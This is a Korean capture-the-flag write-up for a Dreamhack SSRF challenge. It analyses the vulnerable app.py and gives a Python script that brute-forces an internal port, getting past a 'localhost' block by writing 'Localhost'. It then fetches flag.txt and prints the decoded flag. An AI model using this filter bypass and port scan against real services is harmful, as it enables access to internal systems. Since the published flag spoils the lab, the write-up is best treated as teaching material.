[Dreamhack] Web - SSRF 드림핵 워게임 문제 풀이

5 - 1 - 1. Web - SSRF 취약점 실습

 

 

# Web - SSRF

1. 문제 확인 후 문제 파일 다운로드

사진과는 달리 실제 실습은 9881이 아닌 11090 포트를 사용함

 

 

 

 

2. 문제 속 app.py 파일의 코드 분석

+ << Line 27 ~ 28 >>

: /img_viewer.html 은 GET, POST 두 가지의 요청을 처리 

 

+ << Line 29 ~ 30 >>  

: GET 의 경우

-->  img_viewer.html 을 렌더링

: POST 의 경우

-->  사용자가 입력한 URL에 HTTP 요청 전송 후 그에 대한 응답을 img_viewer.html 의 인자로 하여 렌더링

 

+ << Line 36 ~ 38 >>  

: 서버 주소에 "127.0.0.1" 이나 "localhost" 가 포함된 URL로의 접근 제한

-->  사용자에 의해 입력된 문자열 안에 위 두 요소가 있다면 error.png 반환

 

 

 

+ << Line 49 >>  

: http (=파이썬 기본 모듈) 를 이용하여 임의 포트( = 127.0.0.1 )에 HTTP 서버 실행

: 호스트가 127.0.0.1 -->  외부에서의 서버 접근 방지

 

+ << Line 50 >>  

: 포트 번호는 1500 ~ 1800 사이의 임의의 수

-->  수의 범위가 너무 넓어 직접 대입은 어려움 

 

+ << Line 51 ~ 53 >>  

: http.server.HTTPServer 의 두 번째 인자로 http.server.SimpleHTTPRequestHandler 을 전달

-->  리소스 반환 웹 서버 생성

 

+ << Line 60 >>  

: 타 스레드로 local_server 실행

 

 

 

 

3. 포트번호를 알아내기 위한 Python 스크립트 작성

import requests
import sys
from tqdm import tqdm

NOTFOUND_IMG = "iVBORw0KG"

def send_img(img_url):
    global chall_url
    data = {
        "url": img_url,
    }
    response = requests.post(chall_url, data=data)
    return response.text

def find_port():
    for port in tqdm(range(1500, 1801)):
        img_url = f"http://Localhost:{port}"
        if NOTFOUND_IMG not in send_img(img_url):
            print(f"Internal port number is: {port}")
            break
    return port

if __name__ == "__main__":
    chall_port = 11090
    chall_url = f"http://host1.dreamhack.games:{chall_port}/img_viewer"
    internal_port = find_port()

 

 

 

 

4. VScode 에서 작성한 Python 스크립트 실행

실행 결과

+ 프로그램 실행 결과 포트 번호는 1517임을 확인

 

 

 

 

5. 접속 정보 확인 후 안내된 링크인 http://host1.dreamhack.games:11090/  으로 접속 

사진과는 달리 실제 실습은 9881이 아닌 11090 포트를 사용함

 

 

 

 

6. Image Viewer 페이지로 이동 후 찾아낸 포트 번호(=1517)를 이용하여 아래와 같이 URL 입력

 

+ http://Localhost:1517/flag.txt 을 url 입력란에 입력

 

 

 

 

7. url 입력 후 F12를 통해 개발자 도구 오픈

 

+ 개발자 도구의 img 부분에서 64base로 인코딩된 상태의 Flag를 발견

 

 

 

 

8. REh7NDNkZDIxODkwNTY0NzVhN2YzYmQxMTQ1NmExN2FkNzF9 부분을 64bit 디코더를 이용하여 디코딩

변환 전

 

변환 후

+ Flag는 DH{43dd2189056475a7f3bd11456a17ad71} 임을 확인